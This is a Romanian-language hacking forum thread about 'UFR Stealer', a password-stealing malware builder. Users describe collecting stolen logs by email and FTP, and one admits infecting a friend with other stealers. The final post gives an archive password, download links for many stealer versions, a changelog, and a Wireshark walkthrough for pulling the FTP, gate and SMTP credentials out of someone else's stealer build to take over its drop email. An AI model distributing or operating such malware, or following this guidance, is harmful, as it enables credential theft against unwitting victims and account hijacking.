Jump to content
io.kent

UFR Stealer [Updated- v3.1.1.0]

Recommended Posts

Posted (edited)

Da vad ca daca vreau sa imi vina logurile pe mail,imi trebe ceva adresa din Rusia?

Edit:Am ales optiunea sa imi vina pe ftp,dar intru in server,si imi vine in forma de .bin pe drivehq.com,cum le pot vedea?am incercat sa le bag in notepad,nu merge.

Acum miam facut cont pe mail.ru si imi vin logurile da in forma de .bin nu vad nimic,le downloadez ,dau open file with notepad,si mi se vede un scris mult,in rusa sau nu stiu,dar in orice caz nu vad nici un cont de ceva.

Edited by adi1234
Posted
Am spus ca e ca-m detectat. Dar e bun,

vad ca te pricepi la stealere imi poti spune si mie de ce nu imi trimite toate logurile HCstealer si iStealer,am facut tot ce trebuia si i-am trimis la un prieten,iar la loguri mi-a aparut doar cdkey de la win7ultimate si id-ul lui,dar fara parola,ai steamid,dar fara parola

Posted
vad ca te pricepi la stealere imi poti spune si mie de ce nu imi trimite toate logurile HCstealer si iStealer,am facut tot ce trebuia si i-am trimis la un prieten,iar la loguri mi-a aparut doar cdkey de la win7ultimate si id-ul lui,dar fara parola,ai steamid,dar fara parola

Incearca pe alt host, am patit si eu

Posted (edited)

Evident ca exista, dece sa nu fure, ?

Logic e sa poata fura, din cauza ca nu ai cum sa setezi in asa fel, incat sa cripteze, si nici asa!

Edited by io.kent
Posted (edited)

[uFR Stealer] v.3.1.4.0

[uFR Stealer] v.3.1.4.0

Password: vazonez

Fixed a definition of the axis for the eighth Wendy and server 2k12, fix parsing of some reports - sometimes fell parser, fixed generation HWID - losses is 32 characters, and it seems to be more unique. Well, of added - double killer. Load fayleki reports (as you can and already bin'y proparsennye) -click "Remove duplicates" and it cut out duplicate reports of the same people (it is better to make the copies of reports). Link - default, the password too.

All versions:

v2.0.2.0:
https://vazonez.com/downloads/software/UFR_Stealer_712b80e1ac98cf68e92711b51bfcea34657f50fc.rar
v2.1.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_5397b7ecbf6de27f3abbab9e52bd6a41658b75b7.rar
v2.2.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_9d63abb94829ad629cdf1a36e5f6b89ba145efde.rar
v2.3.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_0d8ce496dec63ff33bc0a810bdaabae1c5ca5aa4.rar
v2.3.1.0:
https://vazonez.com/downloads/software/UFR_Stealer_a1cba295f1810cc10a1c52a9ae75a065ab3f45b4.rar
v2.4.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_5497bb261a4fef7c95f1968a409255f74f2f92aa.rar
v2.5.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_d4082075ba0beb2d5d605c9a4992979108969477.rar
v2.5.1.0:
https://vazonez.com/downloads/software/UFR_Stealer_a5ba3297c851f7c85e7d940b50fedce125903aea.rar
v2.6.0.0:
https://vazonez.com/downloads/software/UFR_Stealer_5bc75ffc14f19b899cbf190b2b125f4b6a0204f4.rar
v3.0.0.0:
https://vazonez.com/downloads/software/UFR_3_0_0_0.zip
v3.0.1.0:
https://vazonez.com/downloads/software/UFR_3_0_1_0.zip
v3.1.0.0:
https://vazonez.com/downloads/software/UFR_3_1_0_0.zip
v3.1.1.0:
https://vazonez.com/downloads/software/UFR_3_1_1_0.zip
v3.1.2.0:
https://vazonez.com/downloads/software/UFR_3_1_2_0.zip

Sniff build UFR Stealer

We will catch the gate/ftp/email, which set the existing build stealer.

We need:

- Build stealer

- Wireshark

- VirtualBox

1. The first thing to do - kill all of the processes that use the network. So it will be easier to find the data you need.

2. Run Wireshark and configure the interface for sniffing: Capture -> Interfaces. Choose the one that you used - in the column will be the largest number of Packets. Click "Start", thereby starting sniffing.

3. Run the build stealer (all on VirtualBox, and nothing else!) and control Process Explorer his work forward to the completion.

4. Go to Wireshark and click Capture -> Stop, that is complete sniffing. We now have a dump of the network activity of the entire system for while working build stealer. It remains to find the desired data.

FTP:

To start trying to detect FTP-server, suddenly stealer in this way sends a report with passwords.

We go to the Wireshark and type into the filter field word "ftp" and press "Enter":

b87a11d78c98.png

We received the packages sent by FTP:

7eeebdac6856.png

(In the picture selected host, username and password of FTP)

Gate:

Try to catch the gate address. Remove the "ftp" from the line filter and look for the package follows stealer. Hit Ctrl + F to open the search window. Choosing a search string (Find by: String) and type into the search string "UFR", leave the rest on the default. If the build is to send the password to the gate, something had to be found.

f1f69531dc9d.png

Email:

To do this in the filter field, trying to type the string "smtp" and see this:

96f678651205.png

Decode username and password from soap sender using this

http://www.opinionatedgeek.com/dotnet/tools/base64decode/

Go to the email and change the password.

Bafta!

Edited by io.kent

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...